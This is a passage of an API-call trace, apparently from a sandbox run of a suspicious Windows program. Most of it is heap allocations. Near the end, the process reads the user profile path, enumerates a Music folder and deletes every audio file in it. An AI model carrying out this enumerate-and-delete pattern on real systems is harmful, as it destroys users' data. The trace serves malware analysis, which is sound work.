hHeap=0x25c0000) returned 1 [0253.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0253.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0253.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0253.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0253.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0253.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0253.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0253.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0253.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0253.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0253.748] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0253.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0253.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0253.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0253.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0253.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0253.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0253.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0253.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0253.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0253.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0253.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0253.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0253.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0253.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0253.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0253.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0253.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0253.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0253.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0253.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0253.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0253.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0253.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0253.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0253.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0253.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0253.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0253.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0253.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0253.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0253.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0253.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0253.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0253.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0253.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0253.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0253.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0253.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0253.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0253.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0253.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0253.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0253.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0253.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0253.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0253.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0253.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0253.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0253.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0253.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0253.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0253.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0253.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0253.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0253.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0253.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0253.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0253.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0253.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0253.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0253.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0253.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0253.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0253.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0253.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0253.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0253.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0253.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0253.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0253.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0253.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0253.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0253.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0253.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0253.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0253.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0253.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0253.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0253.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0253.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0253.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0253.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0253.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2420888 | out: hHeap=0x25c0000) returned 1 [0253.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0253.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0253.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0253.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0253.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0253.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0253.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0253.754] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0253.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0253.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0253.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0253.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0253.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0253.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0253.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0253.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0253.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0253.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0253.754] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0253.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0253.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0253.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa670 [0253.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0253.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0253.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa2e0 [0253.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0253.755] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0253.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0253.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0253.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0253.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0253.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0253.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0253.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0253.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0253.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0253.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0253.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0253.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0253.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0253.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0253.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0253.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0253.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x90) returned 0x24207f0 [0253.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0253.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0253.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0253.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0253.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0253.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0253.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0253.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0253.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0253.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0253.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0253.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x5c) returned 0x240da88 [0253.757] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VvGsoQYq1", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VvGsoQYq1", lpFilePart=0x8bedfc*="VvGsoQYq1") returned 0x2d [0253.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240da88 | out: hHeap=0x25c0000) returned 1 [0253.757] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VvGsoQYq1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vvgsoqyq1")) returned 0x10 [0253.757] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VvGsoQYq1\\*.*", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3242ba0, ftCreationTime.dwHighDateTime=0x1d4d020, ftLastAccessTime.dwLowDateTime=0x7ad8f430, ftLastAccessTime.dwHighDateTime=0x1d4d040, ftLastWriteTime.dwLowDateTime=0x7ad8f430, ftLastWriteTime.dwHighDateTime=0x1d4d040, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1410, dwReserved1=0x4, cFileName=".", cAlternateFileName="")) returned 0xaa5660 [0253.757] FindNextFileW (in: hFindFile=0xaa5660, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3242ba0, ftCreationTime.dwHighDateTime=0x1d4d020, ftLastAccessTime.dwLowDateTime=0x7ad8f430, ftLastAccessTime.dwHighDateTime=0x1d4d040, ftLastWriteTime.dwLowDateTime=0x7ad8f430, ftLastWriteTime.dwHighDateTime=0x1d4d040, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1410, dwReserved1=0x4, cFileName="..", cAlternateFileName="")) returned 1 [0253.757] FindNextFileW (in: hFindFile=0xaa5660, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d684320, ftCreationTime.dwHighDateTime=0x1d4d23f, ftLastAccessTime.dwLowDateTime=0x74ceef0, ftLastAccessTime.dwHighDateTime=0x1d4c676, ftLastWriteTime.dwLowDateTime=0x74ceef0, ftLastWriteTime.dwHighDateTime=0x1d4c676, nFileSizeHigh=0x0, nFileSizeLow=0x9744, dwReserved0=0x1410, dwReserved1=0x4, cFileName="2RNbGxvLX 4rrHWO.mp3", cAlternateFileName="2RNBGX~1.MP3")) returned 1 [0253.757] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VvGsoQYq1\\2RNbGxvLX 4rrHWO.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vvgsoqyq1\\2rnbgxvlx 4rrhwo.mp3")) returned 1 [0253.758] FindNextFileW (in: hFindFile=0xaa5660, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc943f000, ftCreationTime.dwHighDateTime=0x1d4c926, ftLastAccessTime.dwLowDateTime=0xf8844b0, ftLastAccessTime.dwHighDateTime=0x1d4cedd, ftLastWriteTime.dwLowDateTime=0xf8844b0, ftLastWriteTime.dwHighDateTime=0x1d4cedd, nFileSizeHigh=0x0, nFileSizeLow=0x1638a, dwReserved0=0x1410, dwReserved1=0x4, cFileName="G1-SPEmjQb.mp3", cAlternateFileName="G1-SPE~1.MP3")) returned 1 [0253.758] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VvGsoQYq1\\G1-SPEmjQb.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vvgsoqyq1\\g1-spemjqb.mp3")) returned 1 [0253.759] FindNextFileW (in: hFindFile=0xaa5660, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1bf140, ftCreationTime.dwHighDateTime=0x1d4d03c, ftLastAccessTime.dwLowDateTime=0xc91f15d0, ftLastAccessTime.dwHighDateTime=0x1d4cdfb, ftLastWriteTime.dwLowDateTime=0xc91f15d0, ftLastWriteTime.dwHighDateTime=0x1d4cdfb, nFileSizeHigh=0x0, nFileSizeLow=0xd292, dwReserved0=0x1410, dwReserved1=0x4, cFileName="MTZnpu87y.m4a", cAlternateFileName="MTZNPU~1.M4A")) returned 1 [0253.759] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VvGsoQYq1\\MTZnpu87y.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vvgsoqyq1\\mtznpu87y.m4a")) returned 1 [0253.760] FindNextFileW (in: hFindFile=0xaa5660, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2085a0f0, ftCreationTime.dwHighDateTime=0x1d4c5c3, ftLastAccessTime.dwLowDateTime=0x89b71040, ftLastAccessTime.dwHighDateTime=0x1d4cff5, ftLastWriteTime.dwLowDateTime=0x89b71040, ftLastWriteTime.dwHighDateTime=0x1d4cff5, nFileSizeHigh=0x0, nFileSizeLow=0x18a1, dwReserved0=0x1410, dwReserved1=0x4, cFileName="nFIG.mp3", cAlternateFileName="")) returned 1 [0253.760] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VvGsoQYq1\\nFIG.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vvgsoqyq1\\nfig.mp3")) returned 1 [0253.760] FindNextFileW (in: hFindFile=0xaa5660, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67341ce0, ftCreationTime.dwHighDateTime=0x1d4cc9c, ftLastAccessTime.dwLowDateTime=0x9c9cd480, ftLastAccessTime.dwHighDateTime=0x1d4c57b, ftLastWriteTime.dwLowDateTime=0x9c9cd480, ftLastWriteTime.dwHighDateTime=0x1d4c57b, nFileSizeHigh=0x0, nFileSizeLow=0x3297, dwReserved0=0x1410, dwReserved1=0x4, cFileName="oxaAjKHo ZJCzA.wav", cAlternateFileName="OXAAJK~1.WAV")) returned 1 [0253.760] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VvGsoQYq1\\oxaAjKHo ZJCzA.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vvgsoqyq1\\oxaajkho zjcza.wav")) returned 1 [0253.761] FindNextFileW (in: hFindFile=0xaa5660, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79623ec0, ftCreationTime.dwHighDateTime=0x1d4c7a5, ftLastAccessTime.dwLowDateTime=0xb1a15490, ftLastAccessTime.dwHighDateTime=0x1d4cd8d, ftLastWriteTime.dwLowDateTime=0xb1a15490, ftLastWriteTime.dwHighDateTime=0x1d4cd8d, nFileSizeHigh=0x0, nFileSizeLow=0x71be, dwReserved0=0x1410, dwReserved1=0x4, cFileName="pvE7MQutoW.mp3", cAlternateFileName="PVE7MQ~1.MP3")) returned 1 [0253.761] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VvGsoQYq1\\pvE7MQutoW.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vvgsoqyq1\\pve7mqutow.mp3")) returned 1 [0253.762] FindNextFileW (in: hFindFile=0xaa5660, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79623ec0, ftCreationTime.dwHighDateTime=0x1d4c7a5, ftLastAccessTime.dwLowDateTime=0xb1a15490, ftLastAccessTime.dwHighDateTime=0x1d4cd8d, ftLastWriteTime.dwLowDateTime=0xb1a15490, ftLastWriteTime.dwHighDateTime=0x1d4cd8d, nFileSizeHigh=0x0, nFileSizeLow=0x71be, dwReserved0=0x1410, dwReserved1=0x4, cFileName="pvE7MQutoW.mp3", cAlternateFileName="PVE7MQ~1.MP3")) returned 0 [0253.762] FindClose (in: hFindFile=0xaa5660 | out: hFindFile=0xaa5660) returned 1 [0253.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0253.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0253.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0253.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0253.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0253.762] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0253.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0253.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0253.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0253.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0253.762] 